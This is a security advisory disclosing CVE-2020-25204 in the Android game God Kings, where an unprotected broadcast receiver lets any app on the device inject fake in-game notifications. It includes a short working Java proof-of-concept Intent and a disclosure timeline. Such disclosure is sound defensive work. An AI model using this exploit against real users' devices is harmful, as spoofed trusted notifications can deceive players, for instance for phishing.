RCE Security Advisory https://www.rcesecurity.com 1. ADVISORY INFORMATION ======================= Product: God Kings Vendor URL: https://play.google.com/store/apps/details?id=com.innogames.gkandroid Type: Improper Verification of Intent by Broadcast Receiver [CWE-925] Date found: 2020-09-07 Date published: 2020-10-25 CVSSv3 Score: 5.5 (CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N) CVE: CVE-2020-25204 2. CREDITS ========== This vulnerability was discovered and researched by Julien Ahrens from RCE Security. 3. VERSIONS AFFECTED ==================== God Kings 0.60.1 (latest) 4. INTRODUCTION =============== ITS TIME TO BECOME THE WORLDS GREATEST KING!! Compete on the ultimate battleground against epic monsters and tyrannical enemy kings in the vast 3D world of God Kings! Raise an eternal empire and build an army, the likes of which have never been seen! Your strategy, your victory! Summon legendary Guardians and unleash devastating damage upon all those who stand opposed! Join forces with other strong kingdoms and grow your influence on the battlefield together! (from the vendor's homepage) 5. VULNERABILITY DETAILS ======================== The "God Kings" app for Android exposes a broadcast receiver to other apps called "com.innogames.core.frontend.notifications.receivers.LocalNotificationBroadcastReceiver". The purpose of this broadcast receiver is to receive and display in-game push notifications to the player. However, the app does not enforce any authorization schema on the broadcast receiver, thus allowing an attacker (malicious app) to send fully customizable in-game push notifications to the player. An exemplary exploit could look like the following: Intent i = new Intent(); i.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK); i.setComponent(new ComponentName("com.innogames.gkandroid", "com.innogames.core.frontend.notifications.receivers.LocalNotificationBroadcastReceiver")); i.setAction("android.intent.action.MAIN"); Bundle bundle = new Bundle(); bundle.putString("title", "title"); bundle.putString("body", "body"); bundle.putString("tickerText", "tickerText"); bundle.putString("smallIcon" ,"smallIcon"); bundle.putString("largeIcon", "largeIcon"); bundle.putBoolean("displayedInForeground", true); UserInfo userinfo = new UserInfo("1", "2"); bundle.putParcelable("user_info", userinfo); i.putExtra("NotificationExtra", bundle); sendBroadcast(i); 6. RISK ======= A malicious app on the same device is able to exploit this vulnerability to show arbitrary in-game push notifications to the player. The specific problem here is the assumed trust boundary between the user having the God Kings app installed and what the app is actually doing/displaying to the user. So if the player sees the in-game notification, it can be assumed that the shown content is also trusted by the user. 7. SOLUTION =========== - 8. REPORT TIMELINE ================== 2020-09-07: Discovery of the vulnerability 2020-09-08: CVE requested from MITRE 2020-09-08: Contacted vendor via their security@ 2020-09-08: Response from vendor 2020-09-09: MITRE assigns CVE-2020-25204 2020-09-09: Sent a full apk PoC to exploit this issue 2020-09-17: Vendor states that they're working on a fix, but the initial disclosure deadline cannot be met 2020-09-17: Disclosure deadline extended to 24th October 2020 2020-09-25: Vendor states that they've decided not to fix this issue in due time 2020-10-25: Public disclosure 9. REFERENCES ============= -